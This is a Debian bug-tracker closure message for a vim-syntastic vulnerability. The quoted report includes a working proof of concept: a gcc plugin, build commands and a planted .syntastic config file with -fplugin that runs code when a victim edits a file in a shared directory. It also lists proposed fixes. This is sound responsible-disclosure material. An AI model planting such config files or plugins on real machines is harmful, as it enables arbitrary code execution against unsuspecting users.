Your message dated Thu, 19 Apr 2018 15:56:20 +0000
with message-id <e1f9bv2-000ggc...@fasolo.debian.org>
and subject line Bug#894736: fixed in vim-syntastic 3.9.0-1
has caused the Debian Bug report #894736,
regarding Checker config files allow arbitrary code execution scenarios
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
894736: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894736
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: vim-syntastic
Version: 3.8.0-1
Severity: serious
Hello,
syntastic has a Configuration Files[1] feature enabled for several
checkers, where:
a configuration file is looked up in the directory of the file being
checked, then upwards in parent directories. The search stops either
when a file with the right name is found, or when the root of the
filesystem is reached.[1]
[1]
https://github.com/vim-syntastic/syntastic/blob/master/doc/syntastic-checkers.txt#L7744
Each line found in the configuration file is escaped as a single
argument and appended to the checker command being run.
I am not an expert on the various possibly dangerous command line
options of all possible checkers, but I played with one I knew how to
play with, and what follows is a possible attack. There might be easier
attacks on checkers that are enabled by default, since the configuration
files features, as it is now, leaves a pretty wide attack surface open.
## Step 1: a malicious gcc plugin
The source code:
#include <gcc-plugin.h>
#include <stdio.h>
int plugin_is_GPL_compatible;
int plugin_init(struct plugin_name_args *info, /* Argument infor */
struct plugin_gcc_version *ver) /* Version of GCC */
{
fprintf(stdout, "hello\n");
FILE* out = fopen("/tmp/test", "wt");
fprintf(out, "arbitrary code execution\n");
fclose(out);
};
Building the plugin:
$ gcc -I$(gcc -print-file-name=plugin)/include -fPIC -fno-rtti -O2 -shared
plugin.cc -o /tmp/plugin.so
Installing the plugin as nobody.nogroup in /tmp:
$ sudo chown nobody.nogroup /tmp/plugin.so
## Step 2: a syntastic config file
echo -fplugin=/tmp/z.so > /tmp/.syntastic_avrgcc_config
sudo chown nobody.nogroup /.syntastic_avrgcc_config
## Step 3: enable the avrgcc plugin
let g:syntastic_cpp_checkers = ['avrgcc']
## Step 4: edit a C++ file in /tmp
touch /tmp/foo.cc
vim /tmp/foo.cc
## Step 5: cry
$ cat /tmp/test
arbitrary code execution
# What should be different
There are several steps that can avoid this:
1. allow to disable this feature, and ship with this feature disabled by
default
2. stop recursing upwards when hitting a directory that's writable by
someone other than the current user
3. check that the config files are owned by the current user
# Mitigation
I am not a vimscript expert, and unfortunately I have not found a way to
disable this behaviour without editing the syntastic config files.
Enrico
-- System Information:
Debian Release: buster/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Kernel: Linux 4.14.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_IE.UTF-8, LC_CTYPE=en_IE.UTF-8 (charmap=UTF-8),
LANGUAGE=en_IE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages vim-syntastic depends on:
ii vim 2:8.0.1453-1+b1
ii vim-addon-manager 0.5.7
vim-syntastic recommends no packages.
Versions of packages vim-syntastic suggests:
pn checkstyle <none>
pn chktex <none>
pn closure-linter <none>
ii cppcheck 1.82-1
pn foodcritic <none>
pn hlint <none>
pn lacheck <none>
pn libperl-critic-perl <none>
pn libxml2-utils <none>
pn pep8 <none>
pn puppet-lint <none>
ii pyflakes 1.6.0-1
pn pylint <none>
pn python-flake8 <none>
pn shellcheck <none>
pn sparse <none>
pn splint <none>
pn tidy <none>
-- no debconf information
--- End Message ---
--- Begin Message ---
Source: vim-syntastic
Source-Version: 3.9.0-1
We believe that the bug you reported is fixed in the latest version of
vim-syntastic, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 894...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Andrea Capriotti <capri...@debian.org> (supplier of updated vim-syntastic
package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Thu, 19 Apr 2018 09:38:52 +0200
Source: vim-syntastic
Binary: vim-syntastic
Architecture: source all
Version: 3.9.0-1
Distribution: unstable
Urgency: medium
Maintainer: Andrea Capriotti <capri...@debian.org>
Changed-By: Andrea Capriotti <capri...@debian.org>
Description:
vim-syntastic - Syntax checking hacks for vim
Closes: 894736
Changes:
vim-syntastic (3.9.0-1) unstable; urgency=medium
.
* New upstream release (Closes: #894736)
* Git repository migrated to Salsa
* Standard version bumped to 4.1.4
Checksums-Sha1:
918fd3b0e5c966d17e1fee1de272fa0f1028a8ce 1883 vim-syntastic_3.9.0-1.dsc
ce9a51de8d3e4542e8bfdd467d74489cdc9957e9 263275 vim-syntastic_3.9.0.orig.tar.gz
4e360b851d081acc77bcf3f6adf9470f77872c2d 5376
vim-syntastic_3.9.0-1.debian.tar.xz
64da9d1a0af01a2fb370fb38e59624f64083c7fa 144740 vim-syntastic_3.9.0-1_all.deb
c3003ad2f4190b0cd1a305ae0a638dc01cf78315 5715
vim-syntastic_3.9.0-1_amd64.buildinfo
Checksums-Sha256:
112e396966d86300c4310cc4db088e848a4a58c820fbdd26614de1c19d2a97f0 1883
vim-syntastic_3.9.0-1.dsc
7ecaed94dc6a5b3e1f8511c94e1df9436fad1895b3337a1cd3d4e77a526c155b 263275
vim-syntastic_3.9.0.orig.tar.gz
43a1b9dcdf9e33f51b0942fad60f8be6bd21fcecdaf75a5ce4e74edb021d0409 5376
vim-syntastic_3.9.0-1.debian.tar.xz
b15d890a45ea852268dbd9366500710b4cef57a398885a7d1dd093f0e6d611db 144740
vim-syntastic_3.9.0-1_all.deb
3aade8830d6056c50e4df4716e843681b8540b3f57518b0c540d216ba31c2078 5715
vim-syntastic_3.9.0-1_amd64.buildinfo
Files:
721a969c67bdafc53480689d69dbd842 1883 editors extra vim-syntastic_3.9.0-1.dsc
9632d807d54de03968fad8ccbe831764 263275 editors extra
vim-syntastic_3.9.0.orig.tar.gz
81dcadf07a25444d36fdf0fc40fa26cf 5376 editors extra
vim-syntastic_3.9.0-1.debian.tar.xz
9b55221101d3c1f13143fa839da00c65 144740 editors extra
vim-syntastic_3.9.0-1_all.deb
1f71dbc1b5bd1e0b2bef961b68e435af 5715 editors extra
vim-syntastic_3.9.0-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEGvhvgTlGG2tOSvezC6/u7+lpvVQFAlrYhq4ACgkQC6/u7+lp
vVSOVA//YOqKEkpBZbf/1/RXqnyz08LovIrNoNrwcWW1Low5PR+yh8wf+i9H2QnM
rbIa62nYV5u40elIJIiEB2oi1SBR96F3b/71NwAhWAMtQb3dFbOiy/n2+wxMvL0/
FfE+vGKBnFegERHnPhSEms5E5jfRPw72RSVaqljDlaUrXWdL8rUGXJ5Zlwkzmx8Z
veyF9GizlCP2QI8mvjMlhMYN6Iv/GYotIisE84hFKSKVccShaDsmShHLm4R6LYDi
YjGDhnsF8Hrqs9x+l40aMh9E5gP4XP2j2XFfF+20h54pKfA9FgmTUpLRlCWWRJWI
5rSUAlO9F6qfK8FCUzDkGW03b5lmcrh7/jJXekpEyS6uzbSDU+c+gNXLfyT0jZOI
pSBaRzD0Y/krcCb07VaT29eDXkj7YAGaF7NtujlGedkxfBvynsM9uXYdQAT1yb4w
py0jBK74gaVdBY+XlF6W+KYme4JDOxrNzagaPlBRSu3XhRtSOa+viT4kdv2KrNYG
sUn4a0oJzQCfyS5ZQpgH+RanqwCWEI1eIGbMahRDJGcY+dZejr/Zj6pg1MxYarqb
rwf27BvUZXBotEi2UVJSXSxO24QLa+gshSRLyqh8tNvzL2MLtcgE51d7co7SErEU
2xGAklYKa+z6IVpN4HbfGu8Yoby2mF5er+JcZK1QuH/AyVKf8Sk=
=k++O
-----END PGP SIGNATURE-----
--- End Message ---
